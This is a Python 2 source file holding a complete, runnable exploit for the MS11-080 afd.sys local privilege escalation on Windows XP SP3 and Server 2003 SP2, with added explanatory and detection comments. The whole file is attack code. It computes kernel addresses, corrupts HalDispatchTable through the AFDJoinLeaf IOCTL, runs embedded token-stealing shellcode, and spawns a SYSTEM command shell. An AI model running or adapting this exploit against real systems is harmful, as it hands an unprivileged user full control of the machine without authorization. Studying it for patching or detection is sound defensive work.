# Proof-of-concept for the MS11-080 afd.sys local privilege escalation on the
# builds named in the source (Windows XP SP3 / Server 2003 SP2).  Python 2
# only: print statements, `raise X, msg` syntax and str-as-bytes buffers.
# There is no main() guard, so importing this module runs the whole exploit.
# CDLL, POINTER, HANDLE and time are imported but never used.
from ctypes import (windll, CDLL, Structure, byref, sizeof, POINTER,
                    c_char, c_short, c_ushort, c_int, c_uint, c_ulong,
                    c_void_p, c_long, c_char_p)
from ctypes.wintypes import HANDLE, DWORD
import socket, time, os, struct, sys
from optparse import OptionParser

# The only command-line input is the target-OS switch; it selects the
# hard-coded hal.dll offsets and per-OS byte offsets used further down.
usage = "%prog -O TARGET_OS"
parser = OptionParser(usage=usage)
parser.add_option("-O", "--target-os", type="string",
                  action="store", dest="target_os",
                  help="Target OS. Accepted values: XP, 2K3")
(options, args) = parser.parse_args()
OS = options.target_os
# Anything other than XP / 2K3 (case-insensitive) prints the help and exits
# with status 0.
if not OS or OS.upper() not in ['XP','2K3']:
    parser.print_help()
    sys.exit()
OS = OS.upper()

# Module handles for the raw Win32 / native API calls below.
kernel32 = windll.kernel32
ntdll = windll.ntdll
Psapi = windll.Psapi
def findSysBase(drvname=None):
    """Locate a loaded kernel-mode image through the Psapi driver list.

    With ``drvname`` (already lower-cased base name, e.g. "hal.dll") returns
    the base address of the first matching driver, or None.  Without it,
    returns ``(base, name)`` for the first driver whose base name contains
    "krnl" (treated by the author as the NT kernel image), or None.
    Progress lines are printed to stdout as a side effect.
    """
    ARRAY_SIZE = 1024
    myarray = c_ulong * ARRAY_SIZE
    lpImageBase = myarray()
    # NOTE(review): cb is the byte size EnumDeviceDrivers may fill, but it is
    # passed as 1024 rather than sizeof(lpImageBase); with a 4-byte c_ulong
    # only the first 256 slots can ever be populated.  lpcbNeeded is never
    # inspected afterwards.
    cb = c_int(1024)
    lpcbNeeded = c_long()
    drivername_size = c_long()
    drivername_size.value = 48
    Psapi.EnumDeviceDrivers(byref(lpImageBase), cb, byref(lpcbNeeded))
    for baseaddy in lpImageBase:
        # NOTE(review): the API writes the driver name into a c_char_p built
        # from a Python str, i.e. into an immutable object's storage.  That
        # happens to work on CPython 2 but is not a supported ctypes pattern;
        # create_string_buffer is the intended way to pass a writable buffer.
        drivername = c_char_p("\x00"*drivername_size.value)
        # Unfilled array slots are zero; skip them.
        if baseaddy:
            Psapi.GetDeviceDriverBaseNameA(baseaddy, drivername,
                                           drivername_size.value)
            if drvname:
                # drvname itself is not lower-cased here; callers must do it.
                if drivername.value.lower() == drvname:
                    print "[+] Retrieving %s info..." % drvname
                    print "[+] %s base address: %s" % (drvname, hex(baseaddy))
                    return baseaddy
            else:
                if drivername.value.lower().find("krnl") !=-1:
                    print "[+] Retrieving Kernel info..."
                    print "[+] Kernel version:", drivername.value
                    print "[+] Kernel base address: %s" % hex(baseaddy)
                    return (baseaddy, drivername.value)
    # Nothing matched (or nothing was enumerated).  Callers below do not
    # check for this and will raise TypeError on unpacking / arithmetic.
    return None

print "[>] MS11-080 Privilege Escalation Exploit"
print "[>] Matteo Memelli - ryujin@offsec.com"
print "[>] Release Date 28/11/2011"

# Winsock is called directly through ctypes instead of the socket module so
# that the raw SOCKET handle can later be passed to ZwDeviceIoControlFile.
WSAGetLastError = windll.Ws2_32.WSAGetLastError
WSAGetLastError.argtypes = ()
WSAGetLastError.restype = c_int
# SOCKET is declared as a signed int, so INVALID_SOCKET reads back as -1.
SOCKET = c_int
WSASocket = windll.Ws2_32.WSASocketA
# (af, type, protocol, lpProtocolInfo, g, dwFlags)
WSASocket.argtypes = (c_int, c_int, c_int, c_void_p, c_uint, DWORD)
WSASocket.restype = SOCKET
closesocket = windll.Ws2_32.closesocket
closesocket.argtypes = (SOCKET,)
closesocket.restype = c_int
connect = windll.Ws2_32.connect
# (s, name, namelen); name is passed as byref(sockaddr_in) below.
connect.argtypes = (SOCKET, c_void_p, c_int)
connect.restype = c_int

class sockaddr_in(Structure):
    """Winsock ``struct sockaddr_in`` as a ctypes structure.

    Field order and widths follow the C definition: address family, port
    and IPv4 address (both expected in network byte order) and eight bytes
    of zero padding.  Instances are handed to ``connect`` via ``byref``.
    """
    _fields_ = (
        ("sin_family", c_short),
        ("sin_port", c_ushort),
        ("sin_addr", c_ulong),
        ("sin_zero", c_char * 8),
    )

## Create our deviceiocontrol socket handle
client = WSASocket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP,
                   None, 0, 0)
# WSASocketA returns INVALID_SOCKET (all bits set) on failure; through the
# signed SOCKET restype that compares equal to ~0.
if client == ~0:
    raise OSError, "WSASocket: %s" % (WSAGetLastError(),)
try:
    addr = sockaddr_in()
    addr.sin_family = socket.AF_INET
    addr.sin_port = socket.htons(4455)
    addr.sin_addr = socket.htonl(0x7f000001) # 127.0.0.1
    ## We need to connect to a closed port, socket state must be CONNECTING
    # The return value is deliberately ignored: a failed/pending connect to
    # loopback port 4455 is the intended outcome, not an error.
    connect(client, byref(addr), sizeof(addr))
except:
    # Bare except so the handle is released on any error before re-raising.
    # On the success path `client` is never closed; the process exits soon
    # after anyway.
    closesocket(client)
    raise

# Requested base for the input-buffer page; NtAllocateVirtualMemory rounds
# it down to page granularity, which is why 0x1000 is used below.
baseadd = c_int(0x1001)
MEMRES = (0x1000 | 0x2000)   # MEM_COMMIT | MEM_RESERVE
PAGEEXE = 0x00000040         # PAGE_EXECUTE_READWRITE
Zerobits = c_int(0)          # unused
RegionSize = c_int(0x1000)
written = c_int(0)           # reused as the lpNumberOfBytesWritten / lpflOldProtect out-param
## This will trigger the path to AfdRestartJoin
# 8 + 8 + 4 + 2 + 1 + 2 + 231 = 256 (0x100) bytes, matching the size passed
# to WriteProcessMemory below.
irpstuff = ("\x41\x41\x41\x41\x42\x42\x42\x42"
            "\x00\x00\x00\x00\x44\x44\x44\x44"
            "\x01\x00\x00\x00"
            "\xe8\x00" + "4" + "\xf0\x00" + "\x45"*231)
## Allocate space for the input buffer
# -1 is the current-process pseudo handle.  dwStatus is never checked, so an
# allocation failure only shows up later as a failed write.
dwStatus = ntdll.NtAllocateVirtualMemory(-1,
                                         byref(baseadd),
                                         0x0,
                                         byref(RegionSize),
                                         MEMRES,
                                         PAGEEXE)
# Copy input buffer to it
kernel32.WriteProcessMemory(-1, 0x1000, irpstuff, 0x100, byref(written))
# Make the page at 0x20000 -- where the payloads are written later --
# executable.  The return value is not checked.
startPage = c_int(0x00020000)
kernel32.VirtualProtect(startPage, 0x1000, PAGEEXE, byref(written))
################################# KERNEL INFO ##################################
lpDriver = c_char_p()        # unused
lpPath = c_char_p()          # unused
lpDrvAddress = c_long()      # unused
# Raises TypeError if findSysBase() returns None (kernel image not found).
(krnlbase, kernelver) = findSysBase()
# Load the kernel image into this process (flag 1 == DONT_RESOLVE_DLL_REFERENCES)
# purely to resolve the export, then rebase the address from the user-mode
# mapping to the kernel's real load address.
hKernel = kernel32.LoadLibraryExA(kernelver, 0, 1)
HalDispatchTable = kernel32.GetProcAddress(hKernel, "HalDispatchTable")
HalDispatchTable -= hKernel
HalDispatchTable += krnlbase
print "[+] HalDispatchTable address:", hex(HalDispatchTable)
# Raises TypeError below if hal.dll is not found (None + int).
halbase = findSysBase("hal.dll")
# These offsets are valid only for the exact hal.dll builds the author
# tested; on any other build the computed addresses are wrong and the
# kernel will most likely crash.
## WinXP SP3
if OS == "XP":
    HaliQuerySystemInformation = halbase+0x16bba # Offset for XPSP3
    HalpSetSystemInformation = halbase+0x19436 # Offset for XPSP3
## Win2k3 SP2
else:
    HaliQuerySystemInformation = halbase+0x1fa1e # Offset for WIN2K3
    HalpSetSystemInformation = halbase+0x21c60 # Offset for WIN2K3
print "[+] HaliQuerySystemInformation address:", hex(HaliQuerySystemInformation)
print "[+] HalpSetSystemInformation address:", hex(HalpSetSystemInformation)

################################# EXPLOITATION #################################
# Two user-mode locations inside the page made executable above; every
# payload is written to both of them.
shellcode_address_dep = 0x0002071e
shellcode_address_nodep = 0x000207b8
# Two-byte prefix prepended to each payload.
padding = "\x90"*2
HalDispatchTable0x4 = HalDispatchTable + 0x4
HalDispatchTable0x8 = HalDispatchTable + 0x8
## tokenbkaddr = 0x00020900
# Per-OS single-byte offsets spliced into the machine code below.  Like the
# hal.dll offsets, they are specific to the named builds.
if OS == "XP":
    _KPROCESS = "\x44"
    _TOKEN = "\xc8"
    _UPID = "\x84"
    _APLINKS = "\x88"
else:
    _KPROCESS = "\x38"
    _TOKEN = "\xd8"
    _UPID = "\x94"
    _APLINKS = "\x98"

# Machine-code payloads kept as opaque byte strings.  The kernel addresses
# computed above are embedded with struct.pack("L", ...) (native unsigned
# long, 4 bytes on Windows).  The variable names state the intent:
# restore_ptrs writes the two HAL function addresses back into
# HalDispatchTable+0x4/+0x8, tokenstealing swaps the current process token,
# restore_token puts the original one back.
restore_ptrs = "\x31\xc0" + \
               "\xb8" + struct.pack("L", HalpSetSystemInformation) + \
               "\xa3" + struct.pack("L", HalDispatchTable0x8) + \
               "\xb8" + struct.pack("L", HaliQuerySystemInformation) + \
               "\xa3" + struct.pack("L", HalDispatchTable0x4)
tokenstealing = "\x52" +\
                "\x53" +\
                "\x33\xc0" +\
                "\x64\x8b\x80\x24\x01\x00\x00" +\
                "\x8b\x40" + _KPROCESS +\
                "\x8b\xc8" +\
                "\x8b\x98" + _TOKEN + "\x00\x00\x00" +\
                "\x89\x1d\x00\x09\x02\x00" +\
                "\x8b\x80" + _APLINKS + "\x00\x00\x00" +\
                "\x81\xe8" + _APLINKS + "\x00\x00\x00" +\
                "\x81\xb8" + _UPID + "\x00\x00\x00\x04\x00\x00\x00" +\
                "\x75\xe8" +\
                "\x8b\x90" + _TOKEN + "\x00\x00\x00" +\
                "\x8b\xc1" +\
                "\x89\x90" + _TOKEN + "\x00\x00\x00" +\
                "\x5b" +\
                "\x5a" +\
                "\xc2\x10"
restore_token = "\x52" +\
                "\x33\xc0" +\
                "\x64\x8b\x80\x24\x01\x00\x00" +\
                "\x8b\x40" + _KPROCESS +\
                "\x8b\x15\x00\x09\x02\x00" +\
                "\x89\x90" + _TOKEN + "\x00\x00\x00" +\
                "\x5a" +\
                "\xc2\x10"

shellcode = padding + restore_ptrs + tokenstealing
shellcode_size = len(shellcode)
# Remembered so the restore payload can later be padded to the same length.
orig_size = shellcode_size
# Write shellcode in userspace (dep)
kernel32.WriteProcessMemory(-1, shellcode_address_dep, shellcode,
                            shellcode_size, byref(written))
# Write shellcode in userspace *(nodep)
kernel32.WriteProcessMemory(-1, shellcode_address_nodep, shellcode,
                            shellcode_size, byref(written))
## Trigger Pointer Overwrite
print "[*] Triggering AFDJoinLeaf pointer overwrite..."
IOCTL = 0x000120bb # AFDJoinLeaf
# Input points into the page filled with irpstuff earlier.
inputbuffer = 0x1004
inputbuffer_size = 0x108
outputbuffer_size = 0x0 # Bypass Probe for Write
# The "output buffer" is a kernel address: the vulnerable afd.sys path
# writes through it, corrupting the HalDispatchTable+0x4 slot.  Detection
# angle for defenders: a user-mode process issuing this AFD IOCTL with an
# output-buffer pointer in kernel address space.  NTSTATUS is never checked.
outputbuffer = HalDispatchTable0x4 + 0x1 # HalDispatchTable+0x4+1
IoStatusBlock = c_ulong()
NTSTATUS = ntdll.ZwDeviceIoControlFile(client,
                                       None,
                                       None,
                                       None,
                                       byref(IoStatusBlock),
                                       IOCTL,
                                       inputbuffer,
                                       inputbuffer_size,
                                       outputbuffer,
                                       outputbuffer_size
                                       )
## Trigger shellcode
# inp is created as a c_ulong and then immediately rebound to a plain int,
# so the first assignment is dead; out receives the query result.
inp = c_ulong()
out = c_ulong()
inp = 0x1337
# Per the author's comment above, this syscall is expected to dispatch
# through the corrupted HalDispatchTable entry and so run the user-mode
# payload in kernel context.  hola (the NTSTATUS) is ignored.  The pattern
# relies on the kernel executing user pages; fixed by MS11-080, and kernels
# with SMEP-style protection would fault here instead.
hola = ntdll.NtQueryIntervalProfile(inp, byref(out))
## Spawn a system shell, w00t!
# The child cmd.exe inherits the (now elevated) token; a SYSTEM cmd.exe
# parented by an unprivileged process is the visible artefact.
print "[*] Spawning a SYSTEM shell..."
os.system("cmd.exe /T:C0 /K cd c:\\windows\\system32")

############################## POST EXPLOITATION ###############################
# Runs only after the spawned cmd.exe exits (os.system blocks).
print "[*] Restoring token..."
## Restore the thingie
shellcode = padding + restore_ptrs + restore_token
shellcode_size = len(shellcode)
# Zero-pad the shorter restore payload to the length of the first one so it
# fully overwrites the earlier bytes at both addresses.
trail_padding = (orig_size - shellcode_size) * "\x00"
shellcode += trail_padding
# Equivalent to shellcode_size = orig_size.
shellcode_size += (orig_size - shellcode_size)
## Write restore shellcode in userspace (dep)
kernel32.WriteProcessMemory(-1, shellcode_address_dep, shellcode,
                            shellcode_size, byref(written))
## Write restore shellcode in userspace (nodep)
kernel32.WriteProcessMemory(-1, shellcode_address_nodep, shellcode,
                            shellcode_size, byref(written))
## Overwrite HalDispatchTable once again
# Same IOCTL / same kernel-address output pointer as before; the slot was
# restored by restore_ptrs during the first run, so it must be corrupted a
# second time to reach the restore payload.  Status again unchecked.
NTSTATUS = ntdll.ZwDeviceIoControlFile(client,
                                       None,
                                       None,
                                       None,
                                       byref(IoStatusBlock),
                                       IOCTL,
                                       inputbuffer,
                                       inputbuffer_size,
                                       outputbuffer,
                                       outputbuffer_size
                                       )
## Trigger restore shellcode
hola = ntdll.NtQueryIntervalProfile(inp, byref(out))
print "[+] Restore done! Have a nice day :)"